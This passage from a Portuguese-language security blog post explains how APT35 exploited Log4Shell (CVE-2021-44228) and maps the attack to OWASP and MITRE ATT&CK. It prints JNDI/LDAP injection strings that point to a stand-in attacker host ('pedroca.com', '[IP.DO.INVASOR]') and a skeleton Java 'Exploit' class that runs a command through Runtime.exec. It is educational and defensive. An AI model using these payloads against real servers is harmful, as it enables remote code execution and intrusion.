<p>Conforme foi dito no decorrer do texto, as <strong>aplicações web</strong> representam um vetor de entrada bastante comum e crítico para os grupos de APT. Na matriz do <em>MITRE</em> essa tática é classificada como <strong>T1190: Explorar aplicativos voltados para o público (Exploit Public-Facing Application)</strong>, dito mais acima.</p>
<blockquote>
<p>“Os adversários podem tentar explorar uma vulnerabilidade em um host ou sistema voltado para a Internet para acessar inicialmente uma rede. A vulnerabilidade no sistema pode ser um bug de software, uma falha temporária ou uma configuração incorreta.</p>
<p>Os aplicativos explorados geralmente são sites/servidores da web, mas podem também incluir banco de dados (como SQL), serviços padrões (SMB ou SSH), protocolos de administração e gerenciamento de dispositivos de rede (SNMP e Smart Install) e qualquer outro sistema com soquetes abertos acessíveis pela Internet.</p>
<p><em>MITRE ATT&amp;CK</em>- Technique T1190</p>
</blockquote>
<p>A exploração de aplicações web e servidores para o público é um método preferencial para obter o Acesso Inicial, pois permite que os atacantes possam contornar as defesas tradicionais. As vulnerabilidades mais exploradas por APTs em aplicações web incluem algumas das já destacadas anteriormente pelo OWASP Top 10, justamente por mapear as fragilidades mais comuns na atualidade.</p>
<h2 id="4-exploração-de-aplicações-web-via-log4shell-cve-2021-44228">4. Exploração de Aplicações web via Log4Shell (CVE 2021-44228)</h2>
<p>O APT35 também conhecido como <strong>Charming Kitten</strong>, <strong>Magic Hound</strong> e <strong>Phosphorus</strong>, é um grupo de ameaças cibernéticas patrocinado pelo Irã que conduz operações de espionagem cibernética de longo prazo. Eles tem como alvo funcionários governamentais e militares europeus, norte-americanos e do Oriente Médio, acadêmicos, jornalistas e organizações como a Organização Mundial da Saúde (OMS).</p>
<p>As operações do APT35 são comumente caracterizadas por campanhas de engenharia social sofisticadas e suas atividades são rastreadas desde 2014.</p>
<table>
<thead>
<tr>
<th>Atributo do APT</th>
<th>Detalhe</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>ID</strong></td>
<td>G0059</td>
</tr>
<tr>
<td><strong>Nome</strong></td>
<td>Magic Hound (APT35, Charming Kitten, Phosphorus)</td>
</tr>
<tr>
<td><strong>Origem Atribuída</strong></td>
<td>Irã</td>
</tr>
<tr>
<td><strong>Alvos comuns</strong></td>
<td>Governo, militares, acadêmicos, jornalistas e organizações de saúde no Oriente Médio, Europa e EUA.</td>
</tr>
<tr>
<td><strong>Tática Primária</strong></td>
<td>Campanhas de engenharia social complexas.</td>
</tr>
<tr>
<td><strong>Ferramentas Notáveis</strong></td>
<td><strong>PowerShell</strong>, <em>webshells</em>, e ferramentas de compressão como <strong>RAR</strong> e <strong>gzip</strong>. Além do uso de malwares como o <em>backdoor</em> <strong>PowerLess</strong>.</td>
</tr>
</tbody>
</table>
<h3 id="41-log4shell">4.1. Log4Shell</h3>
<p>O  <strong>Log4Shell</strong> (CVE 2021-44228) é uma vulnerabilidade <strong>zero day</strong> que foi reportada em novembro de 2021, que possibilita a <strong>execução de código remoto (RCE)</strong> em algumas versões da biblioteca de logging Apache Log4j <strong>2.x de 2.0-beta9 até 2.14.1</strong> e afeta diretamente a <strong>Camada de Aplicação</strong> de diversas apps da web que são baseados em Java.</p>
<p>Este estudo de caso detalha tecnicamente essa exploração do Log4Shell, focando principalmente em como um input em uma aplicação web pode se transformar em um RCE, e mapeando os ataques com base no OWASP Top 10.</p>
<p>Um ponto importante é que o Log4Shell é um ataque que se manifesta na <strong>Camada de Aplicação</strong> na arquitetura de três camadas, mas é iniciado através da <strong>Camada de Apresentação</strong>.</p>
<h3 id="411-o-papel-da-arquitetura-de-aplicações-web-e-o-owasp">4.1.1 O papel da Arquitetura de Aplicações Web e o OWASP</h3>
<p>O Log4Shell é um ataque de <strong>injeção de dados</strong> que se propaga através das camadas:</p>
<table>
<thead>
<tr>
<th><strong>Camada da Arquitetura</strong></th>
<th><strong>Componente comum</strong></th>
<th><strong>CVE Relacionada</strong></th>
<th>Relação com o Ataque</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Apresentação</strong></td>
<td>Formulários Web, Cabeçalhos HTTP</td>
<td><strong>CVE-2021-44228</strong></td>
<td>O atacante injeta o payload JNDI/LDAP em campos de entrada ou cabeçalhos HTTP ( <code>User-Agent</code>), que são processados pela Camada de Aplicação.</td>
</tr>
<tr>
<td><strong>Lógica de Negócio (Aplicação)</strong></td>
<td>Servidor de Aplicação Java (Tomcat, JBoss)</td>
<td><strong>CVE-2021-44228</strong></td>
<td>A vulnerabilidade reside na biblioteca Log4j 2.x, que é parte da Camada de Lógica. O payload é interpretado, resultando em RCE.</td>
</tr>
<tr>
<td><strong>Dados</strong></td>
<td>Banco de Dados (PostgreSQL, MySQL)</td>
<td>(Acesso Indireto)</td>
<td>O RCE obtido na Camada de Aplicação permite o acesso e a manipulação de dados sensíveis, <strong>ameaçando a integridade e disponibilidade da camada de dados</strong>.</td>
</tr>
</tbody>
</table>
<p>Ademais, também se enquadra primariamente na categoria <strong>A05:2025 - Injection</strong> do OWASP Top 10:2025,  pois o ataque é uma forma de injeção onde o atacante injeta uma <em>string</em> maliciosa (<code>${jndi:ldap://...}</code>) que é interpretada pelo <em>logger</em> como um comando, assim acaba sabotando o fluxo de execução do programa.</p>
<h3 id="42-detalhes-do-ataque">4.2. Detalhes do ataque</h3>
<p><img alt="Log4SHell" src="https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zdoilksucqg4nei9h5ba.png">
<em>Source: Check Point Research</em></p>
<p>O Log4Shell explora a funcionalidade de lookups da Log4j, especificamente a capacidade de realizar consultas via <strong>JNDI (Java Naming and Directory Interface)</strong>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-java" data-lang="java"><span class="line"><span class="cl"><span class="n">logger</span><span class="p">.</span><span class="na">info</span><span class="p">(</span><span class="s">&#34;Requisição de: &#34;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">userAgent</span><span class="p">);</span><span class="w">
</span></span></span></code></pre></div><p>O logger é responsável por registrar mensagens de log, enquanto o método info grava uma mensagem de nível <strong>informativo</strong>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-java" data-lang="java"><span class="line"><span class="cl"><span class="n">User</span><span class="o">-</span><span class="n">Agent</span><span class="p">:</span><span class="w"> </span><span class="n">$</span><span class="p">{</span><span class="n">jndi</span><span class="p">:</span><span class="n">ldap</span><span class="p">:</span><span class="c1">//pedroca.com/payload}</span><span class="w">
</span></span></span></code></pre></div><p>A sintaxe de lookup do Log4j permite <strong>substituições dinâmicas</strong>, como no exemplo <code>${env:USERNAME}</code>, que é substituído pelo valor da variável de ambiente <code>USERNAME</code> do sistema operacional.</p>
<p>Entretanto, nas versões do <strong>Log4j 2.0 até 2.14.1</strong>, também eram permitidos <em>lookups</em> via <strong>JNDI (Java Naming and Directory Interface)</strong>, uma API do Java usada para consultar <strong>serviços de diretório em servidores externos</strong>, como LDAP (Lightweight Directory Access Protocol) ou RMI (Remote Method Invocation).</p>
<p>Esse recurso legítimo acabou sendo explorado por atacantes para <strong>carregar e executar código malicioso</strong> <strong>remotamente</strong>.</p>
<p>A exploração do Log4 Shell é um processo de quatro etapas que transforma um simples string de entrada em RCE.</p>
<h3 id="421-1º-etapa-injeção-do-payload-camada-de-apresentação">4.2.1. 1<strong>º Etapa: Injeção do Payload (Camada de Apresentação)</strong></h3>
<p>O atacante injeta o payload JNDI em qualquer campo de entrada que possa ser logado pela aplicação. E o vetor mais comum é o cabeçalho <code>User-Agent</code> de uma requisição HTTP.</p>
<p><strong>Payload JNDI/LDAP:</strong></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-java" data-lang="java"><span class="line"><span class="cl"><span class="n">$</span><span class="p">{</span><span class="n">jndi</span><span class="p">:</span><span class="n">ldap</span><span class="p">:</span><span class="c1">//[IP.DO.INVASOR]:PORTA/[CLASSE.MALICIOSA]}</span><span class="w">
</span></span></span></code></pre></div><h3 id="422-2º-etapa-interpretação-e-consulta-jndi-camada-de-aplicação">4.2.2. 2<strong>º Etapa: Interpretação e Consulta JNDI (Camada de Aplicação)</strong></h3>
<p>A aplicação web recebe a requisição HTTP, o servidor de aplicação processa essa requisição e, em determinado momento, o Log4j registra a entrada (<code>User-Agent</code>), consequentemente encontra a string <code>${PEDROCA}</code> e a interpreta como um lookup e e por fim o lookup JNDI é resolvido, forçando o servidor Java a iniciar a conexão com o servidor LDAP controlado pelo(a) atacante (<code>[IP.DO.INVASOR]:Porta</code> ).</p>
<h3 id="423-3º-etapa-resposta-do-servidor-ldap-e-deserialização">4.2.3. 3<strong>º Etapa: Resposta do Servidor LDAP e Deserialização</strong></h3>
<p>O servidor LDAP do/a atacante responde com uma referência a classe Java maliciosa (<code>[CLASSE.MALICIOSA]</code> ) e URL para download do arquivo <code>.class</code>( via HTTP),  assim o cliente JNDI no servidor vulnerável (lá da Camada de aplicação) segue a referência e baixa o arquivo <code>.class</code>  suspeito, fazendo o próprio servidor Java converter e executar o código da classe suspeita, resultando em uma execução remota de código (RCE).</p>
<h3 id="424-4º-etapa-um-exemplo-de-classe-maliciosa-payload-de-rce">4.2.4. 4<strong>º Etapa: Um exemplo de Classe Maliciosa (Payload de RCE)</strong></h3>
<p>A classe suspeita é estruturada para executar um comando do sistema operacional no momento da sua inicialização.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-java" data-lang="java"><span class="line"><span class="cl"><span class="kn">import</span><span class="w"> </span><span class="nn">java.io.IOException</span><span class="p">;</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="kd">public</span><span class="w"> </span><span class="kd">class</span> <span class="nc">Exploit</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="kd">static</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="k">try</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="n">Runtime</span><span class="p">.</span><span class="na">getRuntime</span><span class="p">().</span><span class="na">exec</span><span class="p">(</span><span class="s">&#34;payload de rce&#34;</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="p">}</span><span class="w"> </span><span class="k">catch</span><span class="w"> </span><span class="p">(</span><span class="n">IOException</span><span class="w"> </span><span class="n">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="n">e</span><span class="p">.</span><span class="na">printStackTrace</span><span class="p">();</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="p">}</span><span class="w">
</span></span></span></code></pre></div><p>O bloco static {} em java é executado automaticamente quando a classe é carregada e assim torna o ataque viável, pois o Log4j faz o lookup e carrega a classe.</p>
<h2 id="5-mapeamento-mitre-attck">5. Mapeamento MITRE ATT&amp;CK</h2>
<table>
<thead>
<tr>
<th>Tática</th>
<th>ID da Tática</th>
<th>Técnica</th>
<th>ID da Técnica</th>
<th>Descrição do Uso no Log4Shell</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Initial Access</strong></td>
<td>TA0001</td>
<td>Exploit Public-Facing Application</td>
<td><strong>T1190</strong></td>
<td>Injeção do payload JNDI/LDAP através de uma entrada de aplicação web.</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>TA0002</td>
<td>Command and Scripting Interpreter</td>
<td><strong>T1059</strong></td>
<td>Execução de comandos via <em>shell</em> reverso ou comandos do sistema operacional injetados na classe suspeita.</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>TA0005</td>
<td>Obfuscated Files or Information</td>
<td><strong>T1027</strong></td>
<td>Uso de lookups aninhados ou ofuscação no payload JNDI para evitar detecção.</td>
</tr>
</tbody>
</table>
<h2 id="5-conclusão">5. Conclusão</h2>
<p>A segurança de aplicações web exige uma abordagem em maior profundidade que considere os vetores de ataque em cada camada de sua arquitetura. A análise  das táticas de grupos de APT como o APT35 mostra a exploração de forma mais ampla sobre as vulnerabilidades, sendo o ataque Log4Shell um exemplo de como uma falha na Camada de Aplicação (OWASP A05: Injection) pode levar a um RCE de impacto muito alto. Sua exploração a partir da entrada de um simples string em uma aplicação web, mostra a necessidade e importância de validação de entrada e de uma postura de segurança mais sólida em todas as camadas de arquitetura.</p>
<h2 id="7-referências">7. Referências</h2>
<p>Check Point. <em>APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit</em>. Disponível em: [<a href="https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/">https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/</a>]</p>
<p>CISA. <em>Apache Log4j Vulnerability Guidance</em>. Disponível em: [<a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance</a>]</p>
<p>MITRE ATT&amp;CK. <em>Group: Charming Kitten (G0067)</em>. Disponível em: [<a href="https://attack.mitre.org/groups/G0059/">https://attack.mitre.org/groups/G0059/</a>]</p>
<p>MITRE ATT&amp;CK. <em>Enterprise ATT&amp;CK Matrix</em>. Disponível em: [<a href="https://attack.mitre.org/matrices/enterprise/">https://attack.mitre.org/matrices/enterprise/</a>]</p>
<p>NVD. <em>CVE-2021-44228 Detail</em>. Disponível em: [<a href="https://nvd.nist.gov/vuln/detail/cve-2021-44228">https://nvd.nist.gov/vuln/detail/cve-2021-44228</a>]</p>
<p>OWASP. (2025). <em>OWASP Top 10:2025</em>. Disponível em: [<a href="https://owasp.org/Top10/">https://owasp.org/Top10/</a>]</p>
<p>Unit 42. <em>Apache log4j Vulnerability CVE-2021-44228</em>.
Disponível em: [<a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/">https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/</a>]</p>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/obtuosa" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="/index.xml" target="_blank" rel="noopener noreferrer me"
    title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2025 .
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    




    
    
        
    

    
    
        
    



    
    <script src="https://obtuosa.github.io/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
